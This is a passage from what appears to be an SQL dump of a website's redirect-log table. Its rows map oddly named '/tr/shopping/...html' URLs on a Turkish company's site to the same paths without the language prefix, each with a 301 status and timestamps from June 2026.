00:00:00',301),(66771,'https://3s-technologies.com.tr/tr/shopping/triadelphous/3553631697.html',NULL,'https://3s-technologies.com.tr/shopping/triadelphous/3553631697.html','',1,0,'2026-06-10 22:29:53','0000-00-00 00:00:00',301),(66772,'https://3s-technologies.com.tr/tr/shopping/synostosis/2008253383.html',NULL,'https://3s-technologies.com.tr/shopping/synostosis/2008253383.html','',1,0,'2026-06-10 22:29:57','0000-00-00 00:00:00',301),(66773,'https://3s-technologies.com.tr/tr/shopping/ootheca/2519932619.html',NULL,'https://3s-technologies.com.tr/shopping/ootheca/2519932619.html','',1,0,'2026-06-10 22:30:02','0000-00-00 00:00:00',301),(66774,'https://3s-technologies.com.tr/tr/shopping/gothamist/1551410296.html',NULL,'https://3s-technologies.com.tr/shopping/gothamist/1551410296.html','',1,0,'2026-06-10 22:30:07','0000-00-00 00:00:00',301),(66775,'https://3s-technologies.com.tr/tr/shopping/erbium/1932410569.html',NULL,'https://3s-technologies.com.tr/shopping/erbium/1932410569.html','',1,0,'2026-06-10 22:30:11','0000-00-00 00:00:00',301),(66776,'https://3s-technologies.com.tr/tr/shopping/pelagicus/4292005735.html',NULL,'https://3s-technologies.com.tr/shopping/pelagicus/4292005735.html','',1,0,'2026-06-10 22:30:15','0000-00-00 00:00:00',301),(66777,'https://3s-technologies.com.tr/tr/shopping/azotized/1067543242.html',NULL,'https://3s-technologies.com.tr/shopping/azotized/1067543242.html','',1,0,'2026-06-10 22:30:19','0000-00-00 00:00:00',301),(66778,'https://3s-technologies.com.tr/tr/shopping/pilatus/2911060744.html',NULL,'https://3s-technologies.com.tr/shopping/pilatus/2911060744.html','',1,0,'2026-06-10 22:30:23','0000-00-00 00:00:00',301),(66779,'https://3s-technologies.com.tr/tr/shopping/perenne/4050100710.html',NULL,'https://3s-technologies.com.tr/shopping/perenne/4050100710.html','',1,0,'2026-06-10 22:30:27','0000-00-00 00:00:00',301),(66780,'https://3s-technologies.com.tr/tr/shopping/cobaltous/2818515433.html',NULL,'https://3s-technologies.com.tr/shopping/cobaltous/2818515433.html','',1,0,'2026-06-10 22:30:33','0000-00-00 00:00:00',301),(66781,'https://3s-technologies.com.tr/tr/shopping/besnow/2884789937.html',NULL,'https://3s-technologies.com.tr/shopping/besnow/2884789937.html','',1,0,'2026-06-10 22:30:36','0000-00-00 00:00:00',301),(66782,'https://3s-technologies.com.tr/tr/shopping/toured/2513197537.html',NULL,'https://3s-technologies.com.tr/shopping/toured/2513197537.html','',1,0,'2026-06-10 22:30:39','0000-00-00 00:00:00',301),(66783,'https://3s-technologies.com.tr/tr/shopping/paleologist/476316721.html',NULL,'https://3s-technologies.com.tr/shopping/paleologist/476316721.html','',1,0,'2026-06-10 22:30:43','0000-00-00 00:00:00',301),(66784,'https://3s-technologies.com.tr/tr/shopping/assignor/2134507833.html',NULL,'https://3s-technologies.com.tr/shopping/assignor/2134507833.html','',1,0,'2026-06-10 22:30:47','0000-00-00 00:00:00',301),(66785,'https://3s-technologies.com.tr/tr/shopping/prognathy/2696015395.html',NULL,'https://3s-technologies.com.tr/shopping/prognathy/2696015395.html','',1,0,'2026-06-10 22:30:51','0000-00-00 00:00:00',301),(66786,'https://3s-technologies.com.tr/tr/shopping/trapeze/2377371691.html',NULL,'https://3s-technologies.com.tr/shopping/trapeze/2377371691.html','',1,0,'2026-06-10 22:30:56','0000-00-00 00:00:00',301),(66787,'https://3s-technologies.com.tr/tr/shopping/vermuth/1536875459.html',NULL,'https://3s-technologies.com.tr/shopping/vermuth/1536875459.html','',1,0,'2026-06-10 22:31:00','0000-00-00 00:00:00',301),(66788,'https://3s-technologies.com.tr/tr/shopping/feudary/3369609466.html',NULL,'https://3s-technologies.com.tr/shopping/feudary/3369609466.html','',1,0,'2026-06-10 22:31:08','0000-00-00 00:00:00',301),(66789,'https://3s-technologies.com.tr/tr/shopping/coyness/3825681881.html',NULL,'https://3s-technologies.com.tr/shopping/coyness/3825681881.html','',1,0,'2026-06-10 22:31:11','0000-00-00 00:00:00',301),(66790,'https://3s-technologies.com.tr/tr/shopping/snowblindness/3950542429.html',NULL,'https://3s-technologies.com.tr/shopping/snowblindness/3950542429.html','',1,0,'2026-06-10 22:31:15','0000-00-00 00:00:00',301),(66791,'https://3s-technologies.com.tr/tr/shopping/bowssen/3338717490.html',NULL,'https://3s-technologies.com.tr/shopping/bowssen/3338717490.html','',1,0,'2026-06-10 22:31:19','0000-00-00 00:00:00',301),(66792,'https://3s-technologies.com.tr/tr/shopping/clipon/1742209760.html',NULL,'https://3s-technologies.com.tr/shopping/clipon/1742209760.html','',1,0,'2026-06-10 22:31:24','0000-00-00 00:00:00',301),(66793,'https://3s-technologies.com.tr/tr/shopping/parapodium/1448215702.html',NULL,'https://3s-technologies.com.tr/shopping/parapodium/1448215702.html','',1,0,'2026-06-10 22:31:27','0000-00-00 00:00:00',301),(66794,'https://3s-technologies.com.tr/tr/shopping/flocci/2342548737.html',NULL,'https://3s-technologies.com.tr/shopping/flocci/2342548737.html','',1,0,'2026-06-10 22:31:31','0000-00-00 00:00:00',301),(66795,'https://3s-technologies.com.tr/tr/shopping/tractator/2036721177.html',NULL,'https://3s-technologies.com.tr/shopping/tractator/2036721177.html','',1,0,'2026-06-10 22:31:36','0000-00-00 00:00:00',301),(66796,'https://3s-technologies.com.tr/tr/shopping/cloaca/1317208957.html',NULL,'https://3s-technologies.com.tr/shopping/cloaca/1317208957.html','',1,0,'2026-06-10 22:31:39','0000-00-00 00:00:00',301),(66797,'https://3s-technologies.com.tr/tr/shopping/treatable/2770482603.html',NULL,'https://3s-technologies.com.tr/shopping/treatable/2770482603.html','',1,0,'2026-06-10 22:31:43','0000-00-00 00:00:00',301),(66798,'https://3s-technologies.com.tr/tr/shopping/ventilate/2612132588.html',NULL,'https://3s-technologies.com.tr/shopping/ventilate/2612132588.html','',1,0,'2026-06-10 22:31:48','0000-00-00 00:00:00',301),(66799,'https://3s-technologies.com.tr/tr/shopping/rubicolus/1231024075.html',NULL,'https://3s-technologies.com.tr/shopping/rubicolus/1231024075.html','',1,0,'2026-06-10 22:31:52','0000-00-00 00:00:00',301),(66800,'https://3s-technologies.com.tr/tr/shopping/orsellic/3039739408.html',NULL,'https://3s-technologies.com.tr/shopping/orsellic/3039739408.html','',1,0,'2026-06-10 22:31:55','0000-00-00 00:00:00',301),(66801,'https://3s-technologies.com.tr/tr/shopping/unsufficience/2916861647.html',NULL,'https://3s-technologies.com.tr/shopping/unsufficience/2916861647.html','',1,0,'2026-06-10 22:31:58','0000-00-00 00:00:00',301),(66802,'https://3s-technologies.com.tr/tr/shopping/creese/1820431348.html',NULL,'https://3s-technologies.com.tr/shopping/creese/1820431348.html','',1,0,'2026-06-10 22:32:02','0000-00-00 00:00:00',301),(66803,'https://3s-technologies.com.tr/tr/shopping/toozoo/4265916747.html',NULL,'https://3s-technologies.com.tr/shopping/toozoo/4265916747.html','',1,0,'2026-06-10 22:32:06','0000-00-00 00:00:00',301),(66804,'https://3s-technologies.com.tr/tr/shopping/purser/1647617958.html',NULL,'https://3s-technologies.com.tr/shopping/purser/1647617958.html','',1,0,'2026-06-10 22:32:11','0000-00-00 00:00:00',301),(66805,'https://3s-technologies.com.tr/tr/shopping/painstaker/1155735534.html',NULL,'https://3s-technologies.com.tr/shopping/painstaker/1155735534.html','',1,0,'2026-06-10 22:32:14','0000-00-00 00:00:00',301),(66806,'https://3s-technologies.com.tr/tr/shopping/necrophore/1161536405.html',NULL,'https://3s-technologies.com.tr/shopping/necrophore/1161536405.html','',1,0,'2026-06-10 22:32:18','0000-00-00 00:00:00',301),(66807,'https://3s-technologies.com.tr/tr/shopping/employ/206896377.html',NULL,'https://3s-technologies.com.tr/shopping/employ/206896377.html','',1,0,'2026-06-10 22:32:22','0000-00-00 00:00:00',301),(66808,'https://3s-technologies.com.tr/tr/shopping/tumular/1697813211.html',NULL,'https://3s-technologies.com.tr/shopping/tumular/1697813211.html','',1,0,'2026-06-10 22:32:27','0000-00-00 00:00:00',301),(66809,'https://3s-technologies.com.tr/tr/shopping/espauliere/1722085166.html',NULL,'https://3s-technologies.com.tr/shopping/espauliere/1722085166.html','',1,0,'2026-06-10 22:32:30','0000-00-00 00:00:00',301),(66810,'https://3s-technologies.com.tr/tr/shopping/depopulacy/823050512.html',NULL,'https://3s-technologies.com.tr/shopping/depopulacy/823050512.html','',1,0,'2026-06-10 22:32:34','0000-00-00 00:00:00',301),(66811,'https://3s-technologies.com.tr/tr/shopping/aphanipterous/1844192255.html',NULL,'https://3s-technologies.com.tr/shopping/aphanipterous/1844192255.html','',1,0,'2026-06-10 22:32:39','0000-00-00 00:00:00',301),(66812,'https://3s-technologies.com.tr/tr/shopping/subminister/2540057213.html',NULL,'https://3s-technologies.com.tr/shopping/subminister/2540057213.html','',1,0,'2026-06-10 22:32:42','0000-00-00 00:00:00',301),(66813,'https://3s-technologies.com.tr/tr/shopping/tangent/3409676835.html',NULL,'https://3s-technologies.com.tr/shopping/tangent/3409676835.html','',1,0,'2026-06-10 22:32:46','0000-00-00 00:00:00',301),(66814,'https://3s-technologies.com.tr/tr/shopping/hesperantha/2771694702.html',NULL,'https://3s-technologies.com.tr/shopping/hesperantha/2771694702.html','',1,0,'2026-06-10 22:32:50','0000-00-00 00:00:00',301),(66815,'https://3s-technologies.com.tr/tr/shopping/obscureness/2169310017.html',NULL,'https://3s-technologies.com.tr/shopping/obscureness/2169310017.html','',1,0,'2026-06-10 22:32:55','0000-00-00 00:00:00',301),(66816,'https://3s-technologies.com.tr/tr/shopping/unfamiliar/3629688695.html',NULL,'https://3s-technologies.com.tr/shopping/unfamiliar/3629688695.html','',1,0,'2026-06-10 22:32:58','0000-00-00 00:00:00',301),(66817,'https://3s-technologies.com.tr/tr/shopping/junketing/3640241893.html',NULL,'https://3s-technologies.com.tr/shopping/junketing/3640241893.html','',1,0,'2026-06-10 22:33:02','0000-00-00 00:00:00',301),(66818,'https://3s-technologies.com.tr/tr/shopping/earpiercer/1424992323.html',NULL,'https://3s-technologies.com.tr/shopping/earpiercer/1424992323.html','',1,0,'2026-06-10 22:33:06','0000-00-00 00:00:00',301),(66819,'https://3s-technologies.com.tr/tr/shopping/pomotis/3488896354.html',NULL,'https://3s-technologies.com.tr/shopping/pomotis/3488896354.html','',1,0,'2026-06-10 22:33:10','0000-00-00 00:00:00',301),(66820,'https://3s-technologies.com.tr/tr/shopping/phyllobranciae/3152834627.html',NULL,'https://3s-technologies.com.tr/shopping/phyllobranciae/3152834627.html','',1,0,'2026-06-10 22:33:14','0000-00-00 00:00:00',301),(66821,'https://3s-technologies.com.tr/tr/shopping/tubuliform/601826537.html',NULL,'https://3s-technologies.com.tr/shopping/tubuliform/601826537.html','',1,0,'2026-06-10 22:33:22','0000-00-00 00:00:00',301),(66822,'https://3s-technologies.com.tr/tr/shopping/parisienne/2442107018.html',NULL,'https://3s-technologies.com.tr/shopping/parisienne/2442107018.html','',1,0,'2026-06-10 22:33:25','0000-00-00 00:00:00',301),(66823,'https://3s-technologies.com.tr/tr/shopping/coulter/1862663323.html',NULL,'https://3s-technologies.com.tr/shopping/coulter/1862663323.html','',1,0,'2026-06-10 22:33:29','0000-00-00 00:00:00',301),(66824,'https://3s-technologies.com.tr/tr/shopping/perivisceral/1182431671.html',NULL,'https://3s-technologies.com.tr/shopping/perivisceral/1182431671.html','',1,0,'2026-06-10 22:33:33','0000-00-00 00:00:00',301),(66825,'https://3s-technologies.com.tr/tr/shopping/pictorial/2198334283.html',NULL,'https://3s-technologies.com.tr/shopping/pictorial/2198334283.html','',1,0,'2026-06-10 22:33:37','0000-00-00 00:00:00',301),(66826,'https://3s-technologies.com.tr/tr/shopping/kiddyish/2786625542.html',NULL,'https://3s-technologies.com.tr/shopping/kiddyish/2786625542.html','',1,0,'2026-06-10 22:33:41','0000-00-00 00:00:00',301),(66827,'https://3s-technologies.com.tr/tr/shopping/bachelorhood/4262376519.html',NULL,'https://3s-technologies.com.tr/shopping/bachelorhood/4262376519.html','',1,0,'2026-06-10 22:33:45','0000-00-00 00:00:00',301),(66828,'https://3s-technologies.com.tr/tr/shopping/similarly/2006877777.html',NULL,'https://3s-technologies.com.tr/shopping/similarly/2006877777.html','',1,0,'2026-06-10 22:33:49','0000-00-00 00:00:00',301),(66829,'https://3s-technologies.com.tr/tr/shopping/bavarica/186166849.html',NULL,'https://3s-technologies.com.tr/shopping/bavarica/186166849.html','',1,0,'2026-06-10 22:33:53','0000-00-00 00:00:00',301),(66830,'https://3s-technologies.com.tr/tr/shopping/inspissation/4144251085.html',NULL,'https://3s-technologies.com.tr/shopping/inspissation/4144251085.html','',1,0,'2026-06-10 22:33:57','0000-00-00 00:00:00',301),(66831,'https://3s-technologies.com.tr/tr/shopping/butterflies/3438535379.html',NULL,'https://3s-technologies.com.tr/shopping/butterflies/3438535379.html','',1,0,'2026-06-10 22:34:01','0000-00-00 00:00:00',301),(66832,'https://3s-technologies.com.tr/tr/shopping/castellated/3288011173.html',NULL,'https://3s-technologies.com.tr/shopping/castellated/3288011173.html','',1,0,'2026-06-10 22:34:05','0000-00-00 00:00:00',301),(66833,'https://3s-technologies.com.tr/tr/shopping/dollhouse/1250707226.html',NULL,'https://3s-technologies.com.tr/shopping/dollhouse/1250707226.html','',1,0,'2026-06-10 22:34:09','0000-00-00 00:00:00',301),(66834,'https://3s-technologies.com.tr/tr/shopping/solenoid/2087523579.html',NULL,'https://3s-technologies.com.tr/shopping/solenoid/2087523579.html','',1,0,'2026-06-10 22:34:13','0000-00-00 00:00:00',301),(66835,'https://3s-technologies.com.tr/tr/shopping/megacephalic/3417805851.html',NULL,'https://3s-technologies.com.tr/shopping/megacephalic/3417805851.html','',1,0,'2026-06-10 22:34:17','0000-00-00 00:00:00',301),(66836,'https://3s-technologies.com.tr/tr/shopping/zoocytium/830227021.html',NULL,'https://3s-technologies.com.tr/shopping/zoocytium/830227021.html','',1,0,'2026-06-10 22:34:21','0000-00-00 00:00:00',301),(66837,'https://3s-technologies.com.tr/tr/shopping/misuser/1495114631.html',NULL,'https://3s-technologies.com.tr/shopping/misuser/1495114631.html','',1,0,'2026-06-10 22:34:25','0000-00-00 00:00:00',301),(66838,'https://3s-technologies.com.tr/tr/shopping/hoarser/1982635510.html',NULL,'https://3s-technologies.com.tr/shopping/hoarser/1982635510.html','',1,0,'2026-06-10 22:34:28','0000-00-00 00:00:00',301),(66839,'https://3s-technologies.com.tr/tr/shopping/embassadress/175132275.html',NULL,'https://3s-technologies.com.tr/shopping/embassadress/175132275.html','',1,0,'2026-06-10 22:34:32','0000-00-00 00:00:00',301),(66840,'https://3s-technologies.com.tr/tr/shopping/aesculus/4083626240.html',NULL,'https://3s-technologies.com.tr/shopping/aesculus/4083626240.html','',1,0,'2026-06-10 22:34:36','0000-00-00 00:00:00',301),(66841,'https://3s-technologies.com.tr/tr/shopping/impalla/3901605076.html',NULL,'https://3s-technologies.com.tr/shopping/impalla/3901605076.html','',1,0,'2026-06-10 22:34:40','0000-00-00 00:00:00',301),(66842,'https://3s-technologies.com.tr/tr/shopping/bleater/672553795.html',NULL,'https://3s-technologies.com.tr/shopping/bleater/672553795.html','',1,0,'2026-06-10 22:34:44','0000-00-00 00:00:00',301),(66843,'https://3s-technologies.com.tr/tr/shopping/monopolize/3970531005.html',NULL,'https://3s-technologies.com.tr/shopping/monopolize/3970531005.html','',1,0,'2026-06-10 22:34:48','0000-00-00 00:00:00',301),(66844,'https://3s-technologies.com.tr/tr/shopping/fellowshiping/3865008282.html',NULL,'https://3s-technologies.com.tr/shopping/fellowshiping/3865008282.html','',1,0,'2026-06-10 22:34:54','0000-00-00 00:00:00',301),(66845,'https://3s-technologies.com.tr/tr/shopping/fatner/3558247974.html',NULL,'https://3s-technologies.com.tr/shopping/fatner/3558247974.html','',1,0,'2026-06-10 22:34:58','0000-00-00 00:00:00',301),(66846,'https://3s-technologies.com.tr/tr/shopping/grane/1857593159.html',NULL,'https://3s-technologies.com.tr/shopping/grane/1857593159.html','',1,0,'2026-06-10 22:35:02','0000-00-00 00:00:00',301),(66847,'https://3s-technologies.com.tr/tr/shopping/wheelworn/314661872.html',NULL,'https://3s-technologies.com.tr/shopping/wheelworn/314661872.html','',1,0,'2026-06-10 22:35:06','0000-00-00 00:00:00',301),(66848,'https://3s-technologies.com.tr/tr/shopping/ecstatical/1526956915.html',NULL,'https://3s-technologies.com.tr/shopping/ecstatical/1526956915.html','',1,0,'2026-06-10 22:35:10','0000-00-00 00:00:00',301),(66849,'https://3s-technologies.com.tr/tr/shopping/jointworm/1780701769.html',NULL,'https://3s-technologies.com.tr/shopping/jointworm/1780701769.html','',1,0,'2026-06-10 22:35:14','0000-00-00 00:00:00',301),(66850,'https://3s-technologies.com.tr/tr/shopping/masquerader/3591138850.html',NULL,'https://3s-technologies.com.tr/shopping/masquerader/3591138850.html','',1,0,'2026-06-10 22:35:18','0000-00-00 00:00:00',301),(66851,'https://3s-technologies.com.tr/tr/shopping/flyblown/3312752076.html',NULL,'https://3s-technologies.com.tr/shopping/flyblown/3312752076.html','',1,0,'2026-06-10 22:35:25','0000-00-00 00:00:00',301),(66852,'https://3s-technologies.com.tr/tr/shopping/mancona/3526012741.html',NULL,'https://3s-technologies.com.tr/shopping/mancona/3526012741.html','',1,0,'2026-06-10 22:35:28','0000-00-00 00:00:00',301),(66853,'https://3s-technologies.com.tr/tr/shopping/forespeech/2904778513.html',NULL,'https://3s-technologies.com.tr/shopping/forespeech/2904778513.html','',1,0,'2026-06-10 22:35:32','0000-00-00 00:00:00',301),(66854,'https://3s-technologies.com.tr/tr/shopping/liman/90454173.html',NULL,'https://3s-technologies.com.tr/shopping/liman/90454173.html','',1,0,'2026-06-10 22:35:36','0000-00-00 00:00:00',301),(66855,'https://3s-technologies.com.tr/tr/shopping/squeak/3170658613.html',NULL,'https://3s-technologies.com.tr/shopping/squeak/3170658613.html','',1,0,'2026-06-10 22:35:40','0000-00-00 00:00:00',301),(66856,'https://3s-technologies.com.tr/tr/shopping/discriminating/3189129697.html',NULL,'https://3s-technologies.com.tr/shopping/discriminating/3189129697.html','',1,0,'2026-06-10 22:35:44','0000-00-00 00:00:00',301),(66857,'https://3s-technologies.com.tr/tr/shopping/eperua/4285723504.html',NULL,'https://3s-technologies.com.tr/shopping/eperua/4285723504.html','',1,0,'2026-06-10 22:35:48','0000-00-00 00:00:00',301),(66858,'https://3s-technologies.com.tr/tr/shopping/safest/3411841441.html',NULL,'https://3s-technologies.com.tr/shopping/safest/3411841441.html','',1,0,'2026-06-10 22:35:54','0000-00-00 00:00:00',301),(66859,'https://3s-technologies.com.tr/tr/shopping/overreacher/161894894.html',NULL,'https://3s-technologies.com.tr/shopping/overreacher/161894894.html','',1,0,'2026-06-10 22:35:57','0000-00-00 00:00:00',301),(66860,'https://3s-technologies.com.tr/tr/shopping/palliobranchiata/683684438.html',NULL,'https://3s-technologies.com.tr/shopping/palliobranchiata/683684438.html','',1,0,'2026-06-10 22:36:01','0000-00-00 00:00:00',301),(66861,'https://3s-technologies.com.tr/tr/shopping/esquisse/870034782.html',NULL,'https://3s-technologies.com.tr/shopping/esquisse/870034782.html','',1,0,'2026-06-10 22:36:05','0000-00-00 00:00:00',301),(66862,'https://3s-technologies.com.tr/tr/shopping/dater/248387368.html',NULL,'https://3s-technologies.com.tr/shopping/dater/248387368.html','',1,0,'2026-06-10 22:36:09','0000-00-00 00:00:00',301),(66863,'https://3s-technologies.com.tr/tr/shopping/misarranging/2297574727.html',NULL,'https://3s-technologies.com.tr/shopping/misarranging/2297574727.html','',1,0,'2026-06-10 22:36:13','0000-00-00 00:00:00',301),(66864,'https://3s-technologies.com.tr/tr/shopping/glaver/1106616362.html',NULL,'https://3s-technologies.com.tr/shopping/glaver/1106616362.html','',1,0,'2026-06-10 22:36:17','0000-00-00 00:00:00',301),(66865,'https://3s-technologies.com.tr/tr/shopping/norethandrolone/2812714562.html',NULL,'https://3s-technologies.com.tr/shopping/norethandrolone/2812714562.html','',1,0,'2026-06-10 22:36:23','0000-00-00 00:00:00',301),(66866,'https://3s-technologies.com.tr/tr/shopping/gastrotomy/3946906116.html',NULL,'https://3s-technologies.com.tr/shopping/gastrotomy/3946906116.html','',1,0,'2026-06-10 22:36:27','0000-00-00 00:00:00',301),(66867,'https://3s-technologies.com.tr/tr/shopping/heliopora/795794817.html',NULL,'https://3s-technologies.com.tr/shopping/heliopora/795794817.html','',1,0,'2026-06-10 22:36:31','0000-00-00 00:00:00',301),(66868,'https://3s-technologies.com.tr/tr/shopping/diopsis/3807376535.html',NULL,'https://3s-technologies.com.tr/shopping/diopsis/3807376535.html','',1,0,'2026-06-10 22:36:34','0000-00-00 00:00:00',301),(66869,'https://3s-technologies.com.tr/tr/shopping/epipetalous/2890772627.html',NULL,'https://3s-technologies.com.tr/shopping/epipetalous/2890772627.html','',1,0,'2026-06-10 22:36:39','0000-00-00 00:00:00',301),(66870,'https://3s-technologies.com.tr/tr/shopping/photoscopic/1124452776.html',NULL,'https://3s-technologies.com.tr/shopping/photoscopic/1124452776.html','',1,0,'2026-06-10 22:36:43','0000-00-00 00:00:00',301),(66871,'https://3s-technologies.com.tr/tr/shopping/gasalier/1540252148.html',NULL,'https://3s-technologies.com.tr/shopping/gasalier/1540252148.html','',1,0,'2026-06-10 22:36:49','0000-00-00 00:00:00',301),(66872,'https://3s-technologies.com.tr/tr/shopping/convolvulaceous/2912272859.html',NULL,'https://3s-technologies.com.tr/shopping/convolvulaceous/2912272859.html','',1,0,'2026-06-10 22:36:52','0000-00-00 00:00:00',301),(66873,'https://3s-technologies.com.tr/tr/shopping/goatskin/3907098355.html',NULL,'https://3s-technologies.com.tr/shopping/goatskin/3907098355.html','',1,0,'2026-06-10 22:36:55','0000-00-00 00:00:00',301),(66874,'https://3s-technologies.com.tr/tr/shopping/purpurate/1020558988.html',NULL,'https://3s-technologies.com.tr/shopping/purpurate/1020558988.html','',1,0,'2026-06-10 22:36:59','0000-00-00 00:00:00',301),(66875,'https://3s-technologies.com.tr/tr/shopping/tibialia/878605193.html',NULL,'https://3s-technologies.com.tr/shopping/tibialia/878605193.html','',1,0,'2026-06-10 22:37:03','0000-00-00 00:00:00',301),(66876,'https://3s-technologies.com.tr/tr/shopping/toreador/2423358062.html',NULL,'https://3s-technologies.com.tr/shopping/toreador/2423358062.html','',1,0,'2026-06-10 22:37:07','0000-00-00 00:00:00',301),(66877,'https://3s-technologies.com.tr/tr/shopping/tamworth/2197381792.html',NULL,'https://3s-technologies.com.tr/shopping/tamworth/2197381792.html','',1,0,'2026-06-10 22:37:11','0000-00-00 00:00:00',301),(66878,'https://3s-technologies.com.tr/tr/shopping/myochrome/1816891152.html',NULL,'https://3s-technologies.com.tr/shopping/myochrome/1816891152.html','',1,0,'2026-06-10 22:37:15','0000-00-00 00:00:00',301),(66879,'https://3s-technologies.com.tr/tr/shopping/chikara/728244526.html',NULL,'https://3s-technologies.com.tr/shopping/chikara/728244526.html','',1,0,'2026-06-10 22:37:19','0000-00-00 00:00:00',301),(66880,'https://3s-technologies.com.tr/tr/shopping/littleease/1631311480.html',NULL,'https://3s-technologies.com.tr/shopping/littleease/1631311480.html','',1,0,'2026-06-10 22:37:23','0000-00-00 00:00:00',301),(66881,'https://3s-technologies.com.tr/tr/shopping/babyish/4091120570.html',NULL,'https://3s-technologies.com.tr/shopping/babyish/4091120570.html','',1,0,'2026-06-10 22:37:42','0000-00-00 00:00:00',301),(66882,'https://3s-technologies.com.tr/tr/shopping/hemiopia/1296313691.html',NULL,'https://3s-technologies.com.tr/shopping/hemiopia/1296313691.html','',1,0,'2026-06-10 22:37:44','0000-00-00 00:00:00',301),(66883,'https://3s-technologies.com.tr/tr/shopping/outagamies/2764518193.html',NULL,'https://3s-technologies.com.tr/shopping/outagamies/2764518193.html','',1,0,'2026-06-10 22:37:48','0000-00-00 00:00:00',301),(66884,'https://3s-technologies.com.tr/tr/shopping/archwife/673131240.html',NULL,'https://3s-technologies.com.tr/shopping/archwife/673131240.html','',1,0,'2026-06-10 22:37:52','0000-00-00 00:00:00',301),(66885,'https://3s-technologies.com.tr/tr/shopping/incombustible/555005806.html',NULL,'https://3s-technologies.com.tr/shopping/incombustible/555005806.html','',1,0,'2026-06-10 22:37:55','0000-00-00 00:00:00',301),(66886,'https://3s-technologies.com.tr/tr/shopping/disenamor/1898307610.html',NULL,'https://3s-technologies.com.tr/shopping/disenamor/1898307610.html','',1,0,'2026-06-10 22:37:59','0000-00-00 00:00:00',301),(66887,'https://3s-technologies.com.tr/tr/shopping/heterosomi/1111341184.html',NULL,'https://3s-technologies.com.tr/shopping/heterosomi/1111341184.html','',1,0,'2026-06-10 22:38:04','0000-00-00 00:00:00',301),(66888,'https://3s-technologies.com.tr/tr/shopping/legislature/789993914.html',NULL,'https://3s-technologies.com.tr/shopping/legislature/789993914.html','',1,0,'2026-06-10 22:38:09','0000-00-00 00:00:00',301),(66889,'https://3s-technologies.com.tr/tr/shopping/mesopterygial/1084645015.html',NULL,'https://3s-technologies.com.tr/shopping/mesopterygial/1084645015.html','',1,0,'2026-06-10 22:38:19','0000-00-00 00:00:00',301),(66890,'https://3s-technologies.com.tr/tr/shopping/landlubber/2398266957.html',NULL,'https://3s-technologies.com.tr/shopping/landlubber/2398266957.html','',1,0,'2026-06-10 22:38:25','0000-00-00 00:00:00',301),(66891,'https://3s-technologies.com.tr/tr/shopping/goodwife/477528804.html',NULL,'https://3s-technologies.com.tr/shopping/goodwife/477528804.html','',1,0,'2026-06-10 22:38:29','0000-00-00 00:00:00',301),(66892,'https://3s-technologies.com.tr/tr/shopping/dendrolite/2201970564.html',NULL,'https://3s-technologies.com.tr/shopping/dendrolite/2201970564.html','',1,0,'2026-06-10 22:38:33','0000-00-00 00:00:00',301),(66893,'https://3s-technologies.com.tr/tr/shopping/bundesversammlung/2514573143.html',NULL,'https://3s-technologies.com.tr/shopping/bundesversammlung/2514573143.html','',1,0,'2026-06-10 22:38:37','0000-00-00 00:00:00',301),(66894,'https://3s-technologies.com.tr/tr/shopping/myogalodae/2948703931.html',NULL,'https://3s-technologies.com.tr/shopping/myogalodae/2948703931.html','',1,0,'2026-06-10 22:39:07','0000-00-00 00:00:00',301),(66895,'https://3s-technologies.com.tr/tr/shopping/heteropoda/3758131590.html',NULL,'https://3s-technologies.com.tr/shopping/heteropoda/3758131590.html','',1,0,'2026-06-10 22:39:12','0000-00-00 00:00:00',301),(66896,'https://3s-technologies.com.tr/tr/shopping/prohibitionist/1460211312.html',NULL,'https://3s-technologies.com.tr/shopping/prohibitionist/1460211312.html','',1,0,'2026-06-10 22:39:17','0000-00-00 00:00:00',301),(66897,'https://3s-technologies.com.tr/tr/shopping/yachtman/969593063.html',NULL,'https://3s-technologies.com.tr/shopping/yachtman/969593063.html','',1,0,'2026-06-10 22:39:22','0000-00-00 00:00:00',301),(66898,'https://3s-technologies.com.tr/tr/shopping/tristearin/3518576231.html',NULL,'https://3s-technologies.com.tr/shopping/tristearin/3518576231.html','',1,0,'2026-06-10 22:39:27','0000-00-00 00:00:00',301),(66899,'https://3s-technologies.com.tr/tr/shopping/ultramarine/1818266758.html',NULL,'https://3s-technologies.com.tr/shopping/ultramarine/1818266758.html','',1,0,'2026-06-10 22:39:32','0000-00-00 00:00:00',301),(66900,'https://3s-technologies.com.tr/tr/shopping/volapukist/1931198470.html',NULL,'https://3s-technologies.com.tr/shopping/volapukist/1931198470.html','',1,0,'2026-06-10 22:39:40','0000-00-00 00:00:00',301),(66901,'https://3s-technologies.com.tr/tr/shopping/expeditionary/3763932493.html',NULL,'https://3s-technologies.com.tr/shopping/expeditionary/3763932493.html','',1,0,'2026-06-10 22:39:45','0000-00-00 00:00:00',301),(66902,'https://3s-technologies.com.tr/tr/shopping/chauliognathus/1286578756.html',NULL,'https://3s-technologies.com.tr/shopping/chauliognathus/1286578756.html','',1,0,'2026-06-10 22:39:50','0000-00-00 00:00:00',301),(66903,'https://3s-technologies.com.tr/tr/shopping/sacristies/446246078.html',NULL,'https://3s-technologies.com.tr/shopping/sacristies/446246078.html','',1,0,'2026-06-10 22:39:55','0000-00-00 00:00:00',301),(66904,'https://3s-technologies.com.tr/tr/shopping/myocommas/4014456407.html',NULL,'https://3s-technologies.com.tr/shopping/myocommas/4014456407.html','',1,0,'2026-06-10 22:40:00','0000-00-00 00:00:00',301),(66905,'https://3s-technologies.com.tr/tr/shopping/anchorperson/1159112223.html',NULL,'https://3s-technologies.com.tr/shopping/anchorperson/1159112223.html','',1,0,'2026-06-10 22:40:05','0000-00-00 00:00:00',301),(66906,'https://3s-technologies.com.tr/tr/shopping/opoterodonta/1841768041.html',NULL,'https://3s-technologies.com.tr/shopping/opoterodonta/1841768041.html','',1,0,'2026-06-10 22:40:10','0000-00-00 00:00:00',301),(66907,'https://3s-technologies.com.tr/tr/shopping/supereminently/2133295734.html',NULL,'https://3s-technologies.com.tr/shopping/supereminently/2133295734.html','',1,0,'2026-06-10 22:40:17','0000-00-00 00:00:00',301),(66908,'https://3s-technologies.com.tr/tr/shopping/orthopristis/867870192.html',NULL,'https://3s-technologies.com.tr/shopping/orthopristis/867870192.html','',1,0,'2026-06-10 22:40:22','0000-00-00 00:00:00',301),(66909,'https://3s-technologies.com.tr/tr/shopping/poohpooh/1940539585.html',NULL,'https://3s-technologies.com.tr/shopping/poohpooh/1940539585.html','',1,0,'2026-06-10 22:40:27','0000-00-00 00:00:00',301),(66910,'https://3s-technologies.com.tr/tr/shopping/micropogonias/808890312.html',NULL,'https://3s-technologies.com.tr/shopping/micropogonias/808890312.html','',1,0,'2026-06-10 22:40:32','0000-00-00 